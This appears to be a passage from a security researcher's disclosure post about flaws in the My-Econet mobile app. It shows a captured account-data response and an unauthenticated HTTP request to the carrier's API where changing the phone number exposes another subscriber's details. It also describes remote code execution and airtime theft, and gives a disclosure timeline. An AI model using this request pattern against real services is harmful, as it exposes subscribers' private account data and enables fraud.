"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"26\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"27\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"28\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"29\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"30\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"31\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"32\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"33\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"34\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"35\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"36\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"37\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"38\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20140605T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"40\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"42\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"43\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"50000\",\"expiryDate\":\"20160103T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"50\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"54\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"55\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"56\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"59\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"61\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"100000\",\"expiryDate\":\"20140610T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"62\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"73\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"80\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"89\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"90\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"92\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20160220T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"93\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20160220T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"94\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20160220T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"95\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20160220T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"96\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20160220T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"97\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20160220T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"104\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"105\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"108\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"110\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20140610T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"111\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"115\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"119\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"120\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"122\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"123\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"145\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"146\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"147\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"148\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"149\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"150\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"155\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"156\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"157\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"176\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"177\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"185\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"195\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"203\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"204\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"205\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"206\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"207\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"208\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"209\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"}],\"supervisionExpiryDate\":\"20160727T12:00:00+0200\",\"serviceFeeExpiryDate\":\"20171025T12:00:00+0200\",\"creditClearanceDate\":\"20190422T12:00:00+0200\",\"serviceRemovalDate\":\"20200720T12:00:00+0200\",\"languageIDCurrent\":\"1\",\"temporaryBlockedFlag\":null,\"chargingResultInformationList\":null,\"offerInformationList\":[{\"expiryDateTime\":\"20160408T19:10:46+0200\",\"offerID\":\"330\",\"offerState\":\"0\",\"offerType\":\"2\",\"productID\":\"11\",\"startDateTime\":\"20160309T18:40:28+0200\",\"packagename\":null}],\"accountFlagAfter\":{\"statebefore\":false,\"activationStatusFlag\":\"1\",\"negativeBarringStatusFlag\":\"0\",\"serviceFeePeriodExpiryFlag\":\"0\",\"serviceFeePeriodWarningActiveFlag\":\"0\",\"supervisionPeriodExpiryFlag\":\"0\",\"supervisionPeriodWarningActiveFlag\":\"0\",\"stateafter\":true},\"accountFlageBefore\":{\"statebefore\":true,\"activationStatusFlag\":\"1\",\"negativeBarringStatusFlag\":\"0\",\"serviceFeePeriodExpiryFlag\":\"0\",\"serviceFeePeriodWarningActiveFlag\":\"0\",\"supervisionPeriodExpiryFlag\":\"0\",\"supervisionPeriodWarningActiveFlag\":\"0\",\"stateafter\":false}}","successStatus":true}
Vulnerable Request ( Services Status )
GET /appsAPI/buddieservices/263783****** HTTP/1.1
Host: applications.econet.co.zw:8080
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip,deflate
Accept-Language: en-GB, en-US
Accept-Charset: utf-8, iso-8859-1, utf-16, gb2312, gbk, *;q=0.7
Connection: close
HTTP/1.1 200 OK
Connection: close
X-Powered-By: Undertow/1
Server: WildFly/8
Content-Type: application/json
Date: Tue, 22 Mar 2016 15:27:18 GMT
{"response":"\r\nEnter command: RESP:1001;","roaming":false,"voicemail":false,"missedcallalert":false,"callWaiting":null,"prbt":null,"successStatus":false,"callForwarding":0}
From the requests its clear that no authentication token or HTTP-header is sent along with the requests. This simple means that this information was intended to be publicly accessible by anyone.
An attacker can just change the phone number in the HTTP request to get potentially sensitive information about another user. Freaky !!!
Remote Code Execution
Looking at the "My-Econet" app Googleplay page shows the app has 10,000 - 50,000 installs. This vulnerability affects all 10-50,00 app users and would require a moderately experienced attacker to exploit. The vulnerability exists in the way messages from the app are displayed on the app. The PoC video below illustrates two methods in which an attacker could remotely execute code in the context of the My-Econet app.
Video POC:Resolution:
The vulnerabilities in the My-Econet app are extremely concerning in that they are not only implementation flaws in processing data on the client apps but also severely lax authentication and poor security implementation on the server. This vulnerability exposes all of EconetZW subscribers to at least one form of attack. Ordinary subscribers have sensitive information about their accounts publicly exposed to the public, and experienced attackers can leverage the "Transfer Airtime" feature and the verification code bruteforce vulnerability to steal airtime from users or remotely divert calls. To the 10-50,000 users of the My-Econet app, an experienced attacker on the same network as the victim can easily intercept traffic reducing effort needed to steal airtime or remotely divert calls. Even more concerning an attacker can remotely execute code in the context of the app and use it to run exploits to gain control of the device. The same remote execution vulnerability can be used to steal the My-Econet app source code which is running inside a Android webview app.
An immediate fix would be to take the server offline effectively killing support for the current version of the app and improve server side authentication and only use https.
Disclosure Timeline:
March 28nd, 2016 : Report sent to My-Econet App Developers.
March 29th, 2016 : Contact from EconetZW acknowledging receipt of report and forwarded to responsible department
April 5th, 2016 : Publicly disclosed vulnerability.
March 29th, 2016 : Contact from EconetZW acknowledging receipt of report and forwarded to responsible department
April 5th, 2016 : Publicly disclosed vulnerability.
This is very appealing, however , it is very important that will mouse click on the connection: application security provider
ReplyDelete